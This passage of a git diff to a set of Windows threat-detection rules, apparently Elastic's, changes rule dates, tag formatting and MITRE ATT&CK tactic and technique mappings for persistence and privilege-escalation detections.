Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -97,31 +84,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.005" name = "Security Support Provider" reference = "https://attack.mitre.org/techniques/T1547/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index 5ce887dd079..f7f30b2155d 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,46 +96,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 4c77031fe53..9e805a654b8 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -147,36 +147,56 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml index a064ad7db7c..998595a716a 100644 --- a/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml +++ b/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -63,21 +63,7 @@ references = ["https://www.elastic.co/security-labs/hunting-for-persistence-usin risk_score = 21 rule_id = "9b6813a1-daf1-457e-b0e6-0bb4e55b8a4c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -91,31 +77,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.003" name = "Windows Management Instrumentation Event Subscription" reference = "https://attack.mitre.org/techniques/T1546/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index df5ba00f618..d1fe98c2dbe 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -100,15 +100,7 @@ references = [ risk_score = 73 rule_id = "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -170,41 +162,46 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml index 848ae070ecd..fd99f614a1a 100644 --- a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml +++ b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,20 +62,7 @@ references = ["https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ risk_score = 47 rule_id = "4ed493fc-d637-4a36-80ff-ac84937e5461" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" @@ -108,39 +95,39 @@ process.parent.name:"sqlservr.exe" and process.command_line : * and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.001" -name = "SQL Stored Procedures" -reference = "https://attack.mitre.org/techniques/T1505/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.001" +name = "SQL Stored Procedures" +reference = "https://attack.mitre.org/techniques/T1505/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 9999667d1d4..d2463cba3c3 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,22 +78,7 @@ references = [ risk_score = 73 rule_id = "2917d495-59bd-4250-b395-c29409b76086" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "new_terms" @@ -153,35 +138,7 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1505" -name = "Server Software Component" -reference = "https://attack.mitre.org/techniques/T1505/" -[[rule.threat.technique.subtechnique]] -id = "T1505.003" -name = "Web Shell" -reference = "https://attack.mitre.org/techniques/T1505/003/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -191,6 +148,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -206,14 +164,28 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 10b36a1c675..518c4aa2c20 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,26 +89,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml index 98d75bb0f11..c8ff89d715e 100644 --- a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml +++ b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/25" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ references = ["https://attack.mitre.org/techniques/T1078/"] risk_score = 47 rule_id = "b2c3d4e5-f6a7-5b6c-9d0e-1f2a3b4c5d6e" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -77,13 +70,13 @@ from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml index 7a12ba94bc3..8ef66f52c9e 100644 --- a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml +++ b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/23" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -42,16 +42,7 @@ references = ["https://www.akamai.com/blog/security-research/abusing-dmsa-for-pr risk_score = 73 rule_id = "2c74e26b-dfe3-4644-b62b-d0482f124210" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -62,27 +53,29 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.AttributeLDAPDi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.002" -name = "Domain Accounts" -reference = "https://attack.mitre.org/techniques/T1078/002/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["winlog.event_data.SubjectUserName"] diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml index 683648ba45d..412967333f8 100644 --- a/rules/windows/privilege_escalation_create_process_as_different_user.toml +++ b/rules/windows/privilege_escalation_create_process_as_different_user.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,14 +57,7 @@ setup = """## Setup Audit events 4624 and 4688 are needed to trigger this rule. """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -83,24 +76,36 @@ sequence by winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" + [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" -[[rule.threat.technique.subtechnique]] -id = "T1134.003" -name = "Make and Impersonate Token" -reference = "https://attack.mitre.org/techniques/T1134/003/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml index ab8e8584da6..5d76a63ef19 100644 --- a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml +++ b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -19,14 +19,7 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-win risk_score = 47 rule_id = "1b0b4818-5655-409b-9c73-341cac4bb73f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -98,24 +91,36 @@ In Windows environments, tokens are used to represent user credentials and permi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1134" name = "Access Token Manipulation" reference = "https://attack.mitre.org/techniques/T1134/" -[[rule.threat.technique.subtechnique]] -id = "T1134.001" -name = "Token Impersonation/Theft" -reference = "https://attack.mitre.org/techniques/T1134/001/" [[rule.threat.technique.subtechnique]] id = "T1134.002" name = "Create Process with Token" reference = "https://attack.mitre.org/techniques/T1134/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1134" +name = "Access Token Manipulation" +reference = "https://attack.mitre.org/techniques/T1134/" +[[rule.threat.technique.subtechnique]] +id = "T1134.002" +name = "Create Process with Token" +reference = "https://attack.mitre.org/techniques/T1134/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 50b903484bb..cdb98a74b03 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,16 +76,7 @@ Audit Directory Service Changes (Success,Failure) ``` """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Data Source: Active Directory", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -98,14 +89,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 8d113e3b967..b2289c53690 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,19 +81,7 @@ references = [ risk_score = 47 rule_id = "d31f183a-e5b1-451b-8534-ba62bca0b404" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -113,51 +101,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - 